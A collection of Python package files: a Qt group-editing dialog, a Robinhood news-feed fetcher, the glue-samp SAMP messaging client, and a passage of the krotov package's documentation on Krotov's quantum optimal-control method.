self.group_lineedit.setText(self._group)
self.group_lineedit.setEnabled(False)
self.destroyed.connect(self._disconnect)
def _create_gui(self) -> None:
self.setWindowTitle(f"Edit the '{self._group}' Group.")
main_layout = QVBoxLayout()
main_layout.setSpacing(10)
main_layout.setContentsMargins(10, 10, 10, 10)
self.setLayout(main_layout)
group_lineedit = self._create_group_lineedit_wdg()
main_layout.addWidget(group_lineedit)
table = self._create_table_wdg()
main_layout.addWidget(table)
btn = self._create_button_wdg()
main_layout.addWidget(btn)
def _create_group_lineedit_wdg(self) -> QGroupBox:
wdg = QGroupBox()
layout = QHBoxLayout()
layout.setContentsMargins(5, 5, 5, 5)
layout.setSpacing(10)
wdg.setLayout(layout)
group_lbl = QLabel(text="Group name:")
group_lbl.setSizePolicy(
QSizePolicy(QSizePolicy.Policy.Fixed, QSizePolicy.Policy.Fixed)
)
self.group_lineedit = QLineEdit()
layout.addWidget(group_lbl)
layout.addWidget(self.group_lineedit)
return wdg
def _create_table_wdg(self) -> QGroupBox:
wdg = QGroupBox()
layout = QHBoxLayout()
layout.setContentsMargins(5, 5, 5, 5)
layout.setSpacing(0)
wdg.setLayout(layout)
self._filter_text = QLineEdit()
self._filter_text.setClearButtonEnabled(True)
self._filter_text.setPlaceholderText("Filter by device or property name...")
self._filter_text.textChanged.connect(self._update_filter)
self._prop_table = DevicePropertyTable(enable_property_widgets=False)
self._prop_table.setRowsCheckable(True)
self._prop_table.checkGroup(self._group)
self._device_filters = DeviceTypeFilters()
self._device_filters.filtersChanged.connect(self._update_filter)
self._device_filters.setShowReadOnly(False)
self._device_filters._read_only_checkbox.hide()
right = QWidget()
right.setLayout(QVBoxLayout())
right.layout().addWidget(self._filter_text)
right.layout().addWidget(self._prop_table)
left = QWidget()
left.setLayout(QVBoxLayout())
left.layout().addWidget(self._device_filters)
self.layout().addWidget(left)
self.layout().addWidget(right)
layout.addWidget(left)
layout.addWidget(right)
return wdg
def _create_button_wdg(self) -> QWidget:
wdg = QWidget()
layout = QHBoxLayout()
layout.setContentsMargins(0, 0, 0, 0)
layout.setSpacing(0)
wdg.setLayout(layout)
self.info_lbl = QLabel()
self.modify_group_btn = QPushButton(text="Modify Group")
self.modify_group_btn.setSizePolicy(
QSizePolicy(QSizePolicy.Policy.Fixed, QSizePolicy.Policy.Fixed)
)
self.modify_group_btn.clicked.connect(self._add_group)
layout.addWidget(self.info_lbl)
layout.addWidget(self.modify_group_btn)
return wdg
def _disconnect(self) -> None:
self._mmc.events.systemConfigurationLoaded.disconnect(self._update_filter)
def _update_filter(self) -> None:
filt = self._filter_text.text().lower()
self._prop_table.filterDevices(
filt, self._device_filters.filters(), self._device_filters.showReadOnly()
)
def _add_group(self) -> None:
# [(device, property, value), ...], need to remove the value
new_dev_prop = [x[:2] for x in self._prop_table.getCheckedProperties()]
presets = self._mmc.getAvailableConfigs(self._group)
preset_dev_prop = [
(k[0], k[1]) for k in self._mmc.getConfigData(self._group, presets[0])
]
if preset_dev_prop == new_dev_prop:
return
# get any new dev prop to add to each preset
_to_add: list[tuple[str, str, str]] = []
for d, p in new_dev_prop:
if (d, p) not in preset_dev_prop:
value = self._mmc.getProperty(d, p)
_to_add.append((d, p, value))
# get the dev prop val to keep per preset
_prop_to_keep: list[list[tuple[str, str, str]]] = []
for preset in presets:
preset_dev_prop_val = [
(k[0], k[1], k[2]) for k in self._mmc.getConfigData(self._group, preset)
]
_to_keep = [
(d, p, v) for d, p, v in preset_dev_prop_val if (d, p) in new_dev_prop
]
_prop_to_keep.append(_to_keep)
self._mmc.deleteConfigGroup(self._group)
for idx, preset in enumerate(presets):
preset_dpv = _prop_to_keep[idx]
if _to_add:
preset_dpv.extend(_to_add)
with block_core(self._mmc.events):
for d, p, v in preset_dpv:
self._mmc.defineConfig(self._group, preset, d, p, v)
self._mmc.events.configDefined.emit(self._group, preset, d, p, v)
self.info_lbl.setText(f"'{self._group}' Group Modified.")
|
PypiClean
|
/ProsperDatareader-2.1.0-py3-none-any.whl/prosper/datareader/robinhood/news.py
|
import itertools
import warnings
import requests
from .. import config
from .. import exceptions
RH_NEWS = 'https://api.robinhood.com/midlands/news/'
PAGE_HARDBREAK = 50
def fetch_company_news_rh(
ticker,
page_limit=None,
uri=RH_NEWS,
_page_hardbreak=PAGE_HARDBREAK, # FIXME?: does this need to move?
logger=config.LOGGER
):
"""parse news feed from robhinhood
Args:
ticker (str): ticker for desired stock
page_limit (int, optional): number of pages to fetch to cap results
uri (str, optional): endpoint address
_page_hardbreak (int, optional): error level for hard-capping limits
logger (:obj:`logging.logger`, optional): logging handle
Returns:
(:obj:`list`): collection of news articles from robinhood
"""
logger.info('fetching company_news for %s', ticker)
page = itertools.count(start=1, step=1)
articles_list = []
while True:
## Generate request ##
page_num = next(page)
if page_num > _page_hardbreak:
warnings.warn(
'pagination limit {} reached'.format(PAGE_HARDBREAK),
exceptions.PaginationWarning
)
break
params = {
'page': page_num,
'symbol': ticker.upper() #caps required
}
logger.info('--fetching page %s for %s from %s', page_num, ticker, uri)
## GET data ##
req = requests.get(uri, params=params)
req.raise_for_status()
page_data = req.json()
articles_list.extend(page_data['results'])
## Loop or quit ##
if page_limit and page_num >= page_limit:
logger.info('--reached page limit: %s:%s', page_num, page_limit)
break
if not page_data['next']:
#NOTE: page_data['next'] does not yield a valid address. Manually step
logger.info('--no more pages on endpoint %s', page_num)
break
return articles_list
|
PypiClean
|
/glue-samp-0.2.tar.gz/glue-samp-0.2/glue_samp/samp_client.py
|
from __future__ import print_function, division, absolute_import
import os
import uuid
import tempfile
from fnmatch import fnmatch
import numpy as np
try:
from astropy.samp import SAMPClientError, SAMPHubServer, SAMPIntegratedClient, SAMPHubError
except ImportError:
from astropy.vo.samp import SAMPClientError, SAMPHubServer, SAMPIntegratedClient, SAMPHubError
from glue import __version__ as glue_version
from glue.core import Data
from glue.logger import logger
from glue.core.data_factories.astropy_table import (astropy_tabular_data_votable,
astropy_tabular_data_fits)
from glue.core.data_factories.fits import fits_reader
from glue.core.data_exporters.gridded_fits import fits_writer
from glue.core.data_exporters.astropy_table import data_to_astropy_table
from glue.core.subset import ElementSubsetState
from glue.external.echo import delay_callback
__all__ = ['SAMPClient']
ICON_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'glue_samp_icon.png')
MTYPES = ['table.load.votable',
'table.load.fits',
'table.highlight.row',
'table.select.rowList',
'image.load.fits',
'samp.hub.event.register',
'samp.hub.event.unregister']
class SAMPClient(object):
def __init__(self, state=None, session=None):
self.state = state
self.session = session
self.data_collection = session.data_collection
self.hub = SAMPHubServer()
self.client = SAMPIntegratedClient()
self.state.add_callback('connected', self.on_connected)
def start_samp(self):
if not self.client.is_connected:
try:
self.client.connect()
except SAMPHubError:
try:
self.hub.start()
self.client.connect()
except Exception:
with delay_callback(self.state, 'connected', 'status'):
self.state.connected = False
self.state.status = 'Could not connect to Hub'
else:
with delay_callback(self.state, 'connected', 'status'):
self.state.connected = True
self.state.status = 'Connected to (glue) SAMP Hub'
except:
with delay_callback(self.state, 'connected', 'status'):
self.state.connected = False
self.state.status = 'Could not connect to Hub'
else:
with delay_callback(self.state, 'connected', 'status'):
self.state.connected = True
self.state.status = 'Connected to SAMP Hub'
self.update_clients()
def stop_samp(self):
if self.client.is_connected:
self.client.disconnect()
if self.hub.is_running:
self.hub.stop()
self.state.connected = False
self.state.status = 'Not connected to SAMP Hub'
self.state.clients = []
def register(self):
for mtype in MTYPES:
self.client.bind_receive_call(mtype, self.receive_call)
self.client.bind_receive_notification(mtype, self.receive_notification)
def unregister(self):
try:
for mtype in MTYPES:
self.client.unbind_receive_call(mtype)
self.client.unbind_receive_notification(mtype)
except (AttributeError, SAMPClientError):
pass
def on_connected(self, *args):
if self.state.connected:
metadata = {'author.email': '[email protected]',
'author.name': 'Thomas Robitaille',
'home.page': 'http://www.glueviz.org',
'samp.description.text': 'Multi-dimensional linked data exploration',
'samp.documentation.url': 'http://www.glueviz.org',
'samp.icon.url': 'file://' + ICON_PATH,
'samp.name': 'glueviz',
'glue.version': glue_version}
self.client.declare_metadata(metadata)
self.update_clients()
def update_clients(self):
clients = []
for client in self.client.get_registered_clients():
metadata = self.client.get_metadata(client)
clients.append((client, metadata.get('samp.name', client)))
self.state.clients = clients
def send_data(self, layer=None, client=None):
filename = tempfile.mktemp()
message = {}
message["samp.params"] = {}
if isinstance(layer, Data):
if layer.ndim == 1:
table = data_to_astropy_table(layer)
table.write(filename, format='votable')
message["samp.mtype"] = "table.load.votable"
if 'samp-table-id' not in layer.meta:
layer.meta['samp-table-id'] = str(uuid.uuid4())
message["samp.params"]['table-id'] = layer.meta['samp-table-id']
elif layer.ndim == 2:
fits_writer(filename, layer)
message["samp.mtype"] = "image.load.fits"
if 'samp-image-id' not in layer.meta:
layer.meta['samp-image-id'] = str(uuid.uuid4())
message["samp.params"]['image-id'] = layer.meta['samp-image-id']
else:
return
message["samp.params"]['name'] = layer.label
message["samp.params"]['url'] = 'file://' + os.path.abspath(filename)
else:
message['samp.mtype'] = 'table.select.rowList'
if layer.ndim == 1:
message["samp.params"]['table-id'] = layer.data.meta['samp-table-id']
message["samp.params"]['row-list'] = np.nonzero(layer.to_mask())[0].astype(str).tolist()
else:
return
if client is None:
self.client.notify_all(message)
else:
# Make sure client is subscribed otherwise an exception is raised
subscriptions = self.client.get_subscriptions(client)
for mtype in subscriptions:
if fnmatch(message['samp.mtype'], mtype):
self.client.notify(client, message)
return
else:
return
def receive_call(self, private_key, sender_id, msg_id, mtype, params, extra):
self.receive_message(private_key, sender_id, msg_id, mtype, params, extra)
self.client.reply(msg_id, {"samp.status": "samp.ok", "samp.result": {}})
def receive_notification(self, private_key, sender_id, msg_id, mtype, params, extra):
self.receive_message(private_key, sender_id, msg_id, mtype, params, extra)
def receive_message(self, private_key, sender_id, msg_id, mtype, params, extra):
logger.info('SAMP: received message - sender_id={0} msg_id={1} mtype={2} '
'params={3} extra={4}'.format(sender_id, msg_id, mtype,
params, extra))
if mtype.startswith('table.load'):
if self.table_id_exists(params['table-id']):
logger.info('SAMP: table with table-id={0} has already '
'been read in'.format(params['table-id']))
return
logger.info('SAMP: loading table with table-id={0}'.format(params['table-id']))
if mtype == 'table.load.votable':
data = astropy_tabular_data_votable(params['url'])
elif mtype == 'table.load.fits':
data = astropy_tabular_data_fits(params['url'])
else:
logger.info('SAMP: unknown format {0}'.format(mtype.split('.')[-1]))
return
if 'name' in params:
data.label = params['name']
if 'table-id' in params:
data.meta['samp-table-id'] = params['table-id']
self.data_collection.append(data)
elif mtype.startswith('image.load'):
if self.image_id_exists(params['image-id']):
logger.info('SAMP: image with image-id={0} has already '
'been read in'.format(params['image-id']))
return
logger.info('SAMP: loading image with image-id={0}'.format(params['image-id']))
if mtype == 'image.load.fits':
data = fits_reader(params['url'])[0]
else:
logger.info('SAMP: unknown format {0}'.format(mtype.split('.')[-1]))
return
if 'name' in params:
data.label = params['name']
if 'image-id' in params:
data.meta['samp-image-id'] = params['image-id']
self.data_collection.append(data)
elif self.state.highlight_is_selection and mtype == 'table.highlight.row':
if not self.table_id_exists(params['table-id']):
return
data = self.data_from_table_id(params['table-id'])
subset_state = ElementSubsetState(indices=[params['row']], data=data)
self.session.edit_subset_mode.update(self.data_collection, subset_state)
elif mtype == 'table.select.rowList':
if not self.table_id_exists(params['table-id']):
return
data = self.data_from_table_id(params['table-id'])
rows = np.asarray(params['row-list'], dtype=int)
subset_state = ElementSubsetState(indices=rows, data=data)
self.session.edit_subset_mode.update(self.data_collection, subset_state)
elif mtype == 'samp.hub.event.register' or mtype == 'samp.hub.event.unregister':
self.update_clients()
def table_id_exists(self, table_id):
for data in self.data_collection:
if data.meta.get('samp-table-id', None) == table_id:
return True
else:
return False
def data_from_table_id(self, table_id):
for data in self.data_collection:
if data.meta.get('samp-table-id', None) == table_id:
return data
else:
raise Exception("Table {0} not found".format(table_id))
def image_id_exists(self, image_id):
for data in self.data_collection:
if data.meta.get('samp-image-id', None) == image_id:
return True
else:
return False
def data_from_image_id(self, image_id):
for data in self.data_collection:
if data.meta.get('samp-image-id', None) == image_id:
return data
else:
raise Exception("image {0} not found".format(image_id))
|
PypiClean
|
/krotov-1.2.1.tar.gz/krotov-1.2.1/docs/07_krotovs_method.rst
|
.. _KrotovsMethod:
Krotov’s Method
===============
The quantum control problem
---------------------------
Quantum optimal control methods formalize the problem of finding
"control fields" that steer the time evolution of a quantum system in
some desired way. For closed systems, described by a Hilbert space state
:math:`\ket{\Psi(t)}`, this time evolution is given by the Schrödinger
equation,
.. math::
\frac{\partial}{\partial t} \Ket{\Psi(t)}
= -\frac{\mathrm{i}}{\hbar} \Op{H}(t)\Ket{\Psi(t)}\,,
where the Hamiltonian :math:`\Op{H}(t)` depends on one or more control
fields :math:`\{\epsilon_l(t)\}`. We often assume the Hamiltonian to be
linear in the controls,
.. math::
\Op{H}(t)
= \Op{H}_0 + \epsilon_1(t) \Op{H}_1 + \epsilon_2(t) \Op{H}_2 + \dots
but non-linear couplings may also occur, for example when considering
non-resonant multi-photon transitions. For open quantum systems
described by a density matrix :math:`\hat{\rho}(t)`, the
Liouville-von-Neumann equation
.. math::
\frac{\partial}{\partial t} \hat{\rho}(t)
= \frac{1}{\hbar} \Liouville(t) \hat{\rho}(t)
replaces the Schrödinger equation, with the (non-Hermitian) Liouvillian
:math:`\Liouville(t)`.
The most direct example of a control problem is a state-to-state transition.
The objective is for a known quantum state :math:`\ket{\phi}` at time
zero to evolve to a specific target state :math:`\ket{\phi^\tgt}` at
final time :math:`T`, controlling, e.g. a chemical
reaction :cite:`TannorJCP1985`.
Another example is the
realization of quantum gates, the building blocks of a quantum computer.
In this case, the states forming a computational basis must transform
according to a unitary transformation :cite:`NielsenChuang`,
see :ref:`HowtoGateOptimization`. Thus, the
control problem involves not just the time evolution of a single state,
but a set of states :math:`\{\ket{\phi_k(t)}\}`. Generalizing even
further, each state :math:`\ket{\phi_k(t)}` in the control problem may
evolve under a different Hamiltonian
:math:`\Op{H}_k(\{\epsilon_l(t)\})`, see :ref:`HowtoRobustOptimization`.
Physically, the control fields :math:`\{\epsilon_l(t)\}` might be the
amplitudes of a laser pulse for the control of molecular systems or
trapped atom/ion quantum computers, radio-frequency fields for nuclear
magnetic resonance, or microwave fields for superconducting circuits.
When there are multiple independent controls :math:`\{\epsilon_l(t)\}`
involved in the dynamics, these may correspond e.g., to different color
lasers used in the excitation of a Rydberg atom, or different
polarization components of an electric field.
The quantum control methods build on a rich field of classical control
theory :cite:`BellmanBook,PontryaginBook`. This includes
Krotov's method :cite:`KrotovEC1983,KrotovCC1988,Krotov.book,KonnovARC99`,
which was originally formulated to optimize the soft landing of a
spacecraft from orbit to the surface of a planet, before being applied
to quantum mechanical
problems :cite:`Tannor92,SomloiCP1993,BartanaJCP1997,SklarzPRA2002,ReichJCP12`.
Fundamentally, they rely on the variational principle, that is, the
minimization of a functional
:math:`J[\{\ket{\phi_k^{(i)}(t)}\}, \{\epsilon_l^{(i)}(t)\}]` that
includes any required constraints via Lagrange multipliers. The
condition for minimizing :math:`J` is then
:math:`\nabla_{\phi_k, \epsilon_l} J = 0`. In rare cases, the
variational calculus can be solved in closed form, based on Pontryagin's
maximum principle :cite:`PontryaginBook`. Numerical methods
are required in any other case. These start from an initial guess
control (or set of guess controls, if there are multiple controls), and
calculate an update to these controls that will decrease the value of
the functional. The updated controls then become the guess for the next
iteration of the algorithm, until the value of the functional is
sufficiently small, or convergence is reached.
Optimization functional
-----------------------
Mathematically, Krotov's method, when applied to quantum
systems :cite:`Tannor92,ReichJCP12`, minimizes a functional
of the most general form
.. math::
:label: functional
J[\{\ket{\phi_k^{(i)}(t)}\}, \{\epsilon_l^{(i)}(t)\}]
= J_T(\{\ket{\phi_k^{(i)}(T)}\})
+ \sum_l \int_0^T g_a(\epsilon_l^{(i)}(t)) \dd t
+ \int_0^T g_b(\{\phi^{(i)}_k(t)\}) \dd t\,,
where the :math:`\{\ket{\phi_k^{(i)}(T)}\}` are the time-evolved
initial states :math:`\{\ket{\phi_k}\}` under the controls
:math:`\{\epsilon^{(i)}_l(t)\}` of the :math:`i`\ 'th iteration. In the
simplest case of a single state-to-state transition, the index :math:`k`
vanishes. For the example of a two-qubit quantum gate,
:math:`\{\ket{\phi_k}\}` would be the logical basis states
:math:`\ket{00}`, :math:`\ket{01}`, :math:`\ket{10}`, and
:math:`\ket{11}`, all evolving under the same Hamiltonian
:math:`\Op{H}_k \equiv \Op{H}`. The sum over :math:`l` vanishes if there
is only a single control. For open system dynamics, the states
:math:`\{\ket{\phi_k}\}` may be density matrices.
The functional consists of three parts:
- A final time functional :math:`J_T`. This is the "main" part of the
functional, and we can usually think of :math:`J` as being an
auxiliary functional in the optimization of :math:`J_T`.
- A running cost on the control fields, :math:`g_a`. The most commonly
used expression (and the only one currently supported by the
:mod:`krotov` package) is :cite:`PalaoPRA2003`
.. math::
:label: g_a
\begin{split}
g_a(\epsilon_l^{(i)}(t))
&= \frac{\lambda_{a,l}}{S_l(t)} \left(
\epsilon_l^{(i)}(t) - \epsilon_{l, \text{ref}}^{(i)}(t)
\right)^2\,;
\quad
\epsilon^{(i)}_{l, \text{ref}}(t) = \epsilon_l^{(i-1)}(t)\\
&= \frac{\lambda_{a,l}}{S_l(t)} \left( \Delta\epsilon_l^{(i)}(t) \right)^2
\,,
\end{split}
with the inverse "step width" :math:`\lambda_{a,l} > 0`, the "update
shape" function :math:`S_{l}(t) \in [0, 1]`, and the :ref:`IterativeControlUpdate`
.. math::
:label: update
\Delta\epsilon_l^{(i)}(t)
\equiv \epsilon_l^{(i)}(t) - \epsilon_l^{(i-1)}(t)\,,
where :math:`\epsilon_l^{(i-1)}(t)` is the optimized control of the
previous iteration – that is, the guess control of the current
iteration :math:`(i)`.
- An optional state-dependent running cost, :math:`g_b`. This may be
used to encode time-dependent control
targets :cite:`KaiserJCP2004,SerbanPRA2005`, or to penalize population in a
subspace :cite:`PalaoPRA2008`. The presence of a
state-dependent constraint in the functional entails an inhomogeneous
term in the backward propagation in the calculation of the control
updates in each iteration of Krotov's method, see Eq. :eq:`bw_eqm`, and is
currently not supported by the :mod:`krotov` package. Penalizing
population in a subspace can also be achieved through simpler methods
that do not require a :math:`g_b`, e.g., by using a non-Hermitian
Hamiltonian to remove population from the forbidden subspace during
the time evolution.
The most commonly used final-time functionals (cf. :mod:`krotov.functionals`)
optimize for a set of initial states :math:`\{\ket{\phi_k}\}` to evolve to a
set of target states :math:`\{\ket{\phi_k^\tgt}\}`. The functionals can then
be expressed in terms of the complex overlaps of the target states with the
final-time states under the given control. Thus,
.. math::
:label: tauk
\tau_k = \Braket{\phi_k^\tgt}{\phi_k(T)}
in Hilbert space, or
.. math::
\tau_k
= \langle\!\langle \Op{\rho}^{\tgt} \vert \Op{\rho}_k(T) \rangle\!\rangle
\equiv \tr\left[\Op{\rho}_k^{\tgt\,\dagger} \Op{\rho}_k(T) \right]
in Liouville space.
The following functionals :math:`J_T` can be formed from these complex
overlaps, taking into account that any optimization functional :math:`J_T` must
be real. They differ by the way they treat the phases :math:`\varphi_k` in the
physical optimization goal :math:`\ket{\phi_k(T)} \overset{!}{=}
e^{i\varphi_k}\ket{\phi_k^{\tgt}}` :cite:`PalaoPRA2003`:
* Optimize for simultaneous state-to-state transitions, with completely
arbitrary phases :math:`\varphi_k`,
.. math::
:label: JTss
J_{T,\text{ss}} = 1- \frac{1}{N} \sum_{k=1}^{N} \Abs{\tau_k}^2\,,
cf. :func:`.J_T_ss`.
* Optimize for simultaneous state-to-state transitions, with an arbitrary
*global* phase, i.e., :math:`\varphi_k = \varphi_{\text{global}}` for all
:math:`k` with arbitrary :math:`\varphi_{\text{global}}`,
.. math::
:label: JTsm
J_{T,\text{sm}} = 1- \frac{1}{N^2} \Abs{\sum_{k=1}^{N} \tau_k}^2
= 1- \frac{1}{N^2} \sum_{k=1}^{N} \sum_{k'=1}^{N} \tau_{k'}^* \tau_{k}\,,
cf. :func:`.J_T_sm`.
* Optimize for simultaneous state-to-state transitions, with a global phase of zero, i.e.,
:math:`\varphi_k = 0` for all :math:`k`,
.. math::
:label: JTre
J_{T,\text{re}} = 1-\frac{1}{N} \Re \left[\, \sum_{k=1}^{N} \tau_k \,\right]\,,
cf. :func:`.J_T_re`.
.. _IterativeControlUpdate:
Iterative control update
------------------------
Starting from the initial guess control :math:`\epsilon_l^{(0)}(t)`, the
optimized field :math:`\epsilon_l^{(i)}(t)` in iteration :math:`i > 0`
is the result of applying a control update,
.. math::
:label: eps_update
\epsilon_l^{(i)}(t)
= \epsilon_l^{(i-1)}(t) + \Delta\epsilon_l^{(i)}(t)\,.
Krotov's method is a clever construction of a particular
:math:`\Delta\epsilon_l^{(i)}(t)` that ensures
.. math::
J[\{\ket{\phi_k^{(i)}(t)}\}, \{\epsilon_l^{(i)}(t)\}] \leq
J[\{\ket{\phi_k^{(i-1)}(t)}\}, \{\epsilon_l^{(i-1)}(t)\}]\,.
Krotov's solution for :math:`\Delta\epsilon_l^{(i)}(t)` is given in
below (:ref:`FirstOrderUpdate` and :ref:`SecondOrderUpdate`).
As shown there,
for the specific running cost of Eq. :eq:`g_a`, using the
guess control field :math:`\epsilon_l^{(i-1)}(t)` as the "reference"
field, the update :math:`\Delta\epsilon^{(i)}_l(t)` is proportional to
:math:`\frac{S_l(t)}{\lambda_{a,l}}`. Note that this also makes
:math:`g_a` proportional to :math:`\frac{S_l(t)}{\lambda_{a,l}}`, so
that Eq. :eq:`g_a` is still well-defined for
:math:`S_l(t) = 0`. The (inverse) Krotov step width
:math:`\lambda_{a,l}` can be used to determine the overall magnitude of
:math:`\Delta\epsilon^{(i)}_l(t)`. Values that are too large will change
:math:`\epsilon_l^{(i)}(t)` by only a small amount in every iteration,
causing slow convergence. Values that are too small will result in numerical
instability, see :ref:`TimeDiscretization` and :ref:`ChoiceOfLambdaA`. The
"update shape" function :math:`S_l(t)` allows to ensure boundary conditions on
:math:`\epsilon^{(i)}_l(t)`: If both the guess field
:math:`\epsilon^{(i-1)}_l(t)` and :math:`S_l(t)` switch on and off smoothly
around :math:`t=0` and :math:`t=T`, then this feature will be preserved by the
optimization. A typical example for an update shape is
.. math::
:label: flattop
S_l(t) = \begin{cases}
B(t; t_0=0, t_1=2 t_{\text{on}})
& \text{for} \quad 0 < t < t_{\text{on}} \\
1 & \text{for} \quad t_{\text{on}} \le t \le T - t_{\text{off}} \\
B(t; t_0=T-2 t_{\text{off}}, t_1=T)
& \text{for} \quad T - t_{\text{off}} < t < T\,,
\end{cases}
cf. :func:`krotov.shapes.flattop`, with the `Blackman shape`_
.. math::
:label: blackman
B(t; t_0, t_1) =
\frac{1}{2}\left(
1 - a - \cos\left(2\pi \frac{t - t_0}{t_1 - t_0}\right)
+ a \cos\left(4\pi \frac{t - t_0}{t_1 - t_0}\right)
\right)\,,\quad a = 0.16\,,
which is similar to a Gaussian, but exactly zero at
:math:`t = t_0, t_1`. This is essential to maintain the typical boundary
condition of zero amplitude at the beginning and end of the optimized
control field. Generally, *any* part of the control field can be kept
unchanged in the optimization by choosing :math:`S_l(t) = 0` for the
corresponding intervals of the time grid.
.. _Blackman shape: https://en.wikipedia.org/wiki/Window_function#Blackman_window
.. Note::
In the remainder of this chapter, we review some of the mathematical details
of how Krotov's method calculates the update in Eqs. :eq:`update`, :eq:`eps_update`.
These details are not necessary to *use* the :mod:`krotov` package as a
"black box" optimization tool, so you may skip ahead to
:ref:`using-krotov-with-qutip` and come back at a later time.
.. _FirstOrderUpdate:
First order update
------------------
Krotov's method is based on a rigorous examination of the conditions for
calculating the updated fields :math:`\{\epsilon_l^{(i)}(t)\}` such that
:math:`J(\{\ket{\phi_k^{(i)}(t)}\}, \{\epsilon_l^{(i)}(t)\}) \leq
J(\{\ket{\phi_k^{(i-1)}(t)}\}, \{\epsilon_l^{(i-1)}(t)\})` is true *by
construction* :cite:`Krotov.book,KonnovARC99,PalaoPRA2003,SklarzPRA2002,ReichJCP12`.
For a general functional of the form in
Eq. :eq:`functional`, with a convex final-time
functional :math:`J_T`, the condition for monotonic convergence is
.. math::
:label: krotov_first_order_proto_update
\frac{\partial g_a}{\partial \epsilon_l(t)}\bigg\vert_{(i)}
= 2 \Im \left[\,
\sum_{k=1}^{N} \Bigg\langle \chi_k^{(i-1)}(t) \Bigg\vert \Bigg(
\frac{\partial \Op{H}}{\partial \epsilon_l(t)}\bigg\vert_{
(i)} \Bigg)
\Bigg\vert \phi_k^{(i)}(t) \Bigg\rangle
\right]\,,
see Ref. :cite:`PalaoPRA2003`.
The notation for the derivative on the right hand side being evaluated
at :math:`{(i)}` should be understood to apply when the control
Hamiltonian is not linear so that
:math:`\frac{\partial \Op{H}}{\partial \epsilon_l(t)}` is still
time-dependent; the derivative must then be evaluated for
:math:`\epsilon^{(i)}_l(t)` – or, numerically, for
:math:`\epsilon^{(i-1)}_l(t) \approx \epsilon^{(i)}_l(t)`. If there are
multiple controls, Eq. :eq:`krotov_first_order_proto_update`
holds for every control field :math:`\epsilon_l(t)` independently.
For :math:`g_a` as in Eq. :eq:`g_a`, this results in an
*update*
equation :cite:`Tannor92,PalaoPRA2003,SklarzPRA2002`,
.. math::
:label: krotov_first_order_update
\Delta\epsilon^{(i)}_l(t)
= \frac{S_l(t)}{\lambda_{a,l}} \Im \left[\,
\sum_{k=1}^{N} \Bigg\langle \chi_k^{(i-1)}(t) \Bigg\vert \Bigg(
\frac{\partial \Op{H}}{\partial \epsilon_l(t)}
\bigg\vert_{(i)} \Bigg)
\Bigg\vert \phi_k^{(i)}(t) \Bigg\rangle
\right]\,,
with the equation of motion for the forward propagation of
:math:`\ket{\phi_k^{(i)}}` under the optimized controls
:math:`\{\epsilon_l^{(i)}(t)\}` of the iteration :math:`(i)`,
.. math::
:label: fw_eqm
\frac{\partial}{\partial t} \Ket{\phi_k^{(i)}(t)}
= -\frac{\mathrm{i}}{\hbar} \Op{H}^{(i)} \Ket{\phi_k^{(i)}(t)}\,.
The co-states :math:`\ket{\chi_k^{(i-1)}(t)}` are propagated backwards
in time under the guess controls of iteration :math:`(i)`, i.e., the
optimized controls from the previous iteration :math:`(i-1)`, as
.. math::
:label: bw_eqm
\frac{\partial}{\partial t} \Ket{\chi_k^{(i-1)}(t)}
= -\frac{\mathrm{i}}{\hbar} \Op{H}^{\dagger\,(i-1)} \Ket{\chi_k^{(i-1)}(t)}
+ \left.\frac{\partial g_b}{\partial \Bra{\phi_k}}\right\vert_{(i-1)}\,,
with the boundary condition
.. math::
:label: chi_boundary
\Ket{\chi_k^{(i-1)}(T)}
= - \left.\frac{\partial J_T}{\partial \Bra{\phi_k(T)}}
\right\vert_{(i-1)}\,,
where the right-hand-side is evaluated for the set of states
:math:`\{\ket{\phi_k^{(i-1)}(T)}\}` resulting from the forward-propagation of
the initial states under the guess controls of iteration :math:`(i)` – that is,
the optimized controls of the previous iteration :math:`(i-1)`.
For example, for the functional :math:`J_{T,\text{ss}}` in Eq. :eq:`JTss` for
a single state-to-state transition (:math:`N=1`),
.. math::
\begin{split}
\ket{\chi^{(i-1)}(T)}
&= \frac{\partial}{\partial \Bra{\phi(T)}}
\underbrace{%
\Braket{\phi(T)}{\phi^\tgt}
\Braket{\phi^\tgt}{\phi(T)}
}_{\Abs{\Braket{\phi^\tgt}{\phi(T)}}^2}
\Bigg\vert_{(i-1)} \\
&= \left(\Braket{\phi^\tgt}{\phi^{(i-1)}(T)}\right) \Ket{\phi^\tgt}\,,
\end{split}
cf. :func:`krotov.functionals.chis_ss` and the :mod:`krotov.functionals` module
in general.
.. _SecondOrderUpdate:
Second order update
-------------------
The update
Eq. :eq:`krotov_first_order_update`
assumes that the equation of motion is linear (:math:`\Op{H}` does not
depend on the states :math:`\ket{\phi_k(t)}`), the functional
:math:`J_T` is convex, and no state-dependent constraints are used
(:math:`g_b\equiv 0`). When any of these conditions are not fulfilled,
it is still possible to derive an optimization algorithm with monotonic
convergence via a "second order" term in
Eqs. :eq:`krotov_first_order_proto_update`, :eq:`krotov_first_order_update` :cite:`KonnovARC99,ReichJCP12`,
The full update equation then reads
.. math::
:label: krotov_second_order_update
\begin{split}
\Delta\epsilon^{(i)}_l(t)
&= \frac{S_l(t)}{\lambda_{a,l}} \Im \left[\,
\sum_{k=1}^{N} \Bigg\langle \chi_k^{(i-1)}(t) \Bigg\vert \Bigg(
\frac{\partial \Op{H}}{\partial \epsilon_l(t)}
\bigg\vert_{(i)} \Bigg)
\Bigg\vert \phi_k^{(i)}(t) \Bigg\rangle
\right. \\ & \qquad \qquad \quad \left.
+ \frac{1}{2} \sigma(t)
\Bigg\langle \Delta\phi_k^{(i)}(t) \Bigg\vert \Bigg(
\frac{\partial \Op{H}}{\partial \epsilon_l(t)}
\bigg\vert_{(i)} \Bigg)
\Bigg\vert \phi_k^{(i)}(t) \Bigg\rangle
\right]\,,
\end{split}
with
.. math::
\ket{\Delta \phi_k^{(i)}(t)}
\equiv \ket{\phi_k^{(i)}(t)} - \ket{\phi_k^{(i-1)}(t)}\,,
see Ref. :cite:`ReichJCP12` for the full construction of
the second-order condition.
In Eq. :eq:`krotov_second_order_update`,
:math:`\sigma(t)` is a scalar function that must be properly chosen to
ensure monotonic convergence.
In Refs. :cite:`WattsPRA2015,GoerzPRA2015`, a non-convex
final-time functional for the optimization towards an arbitrary perfect
entangler is considered. For this specific example, a suitable choice is
.. math:: \sigma(t) \equiv -\max\left(\varepsilon_A,2A+\varepsilon_A\right)\,,
where :math:`\varepsilon_A` is a small non-negative number. The optimal
value for :math:`A` in each iteration can be approximated numerically
as :cite:`ReichJCP12`
.. math::
\label{eq:numericalA}
A = \frac{
\sum_{k=1}^{N} 2 \Re\left[
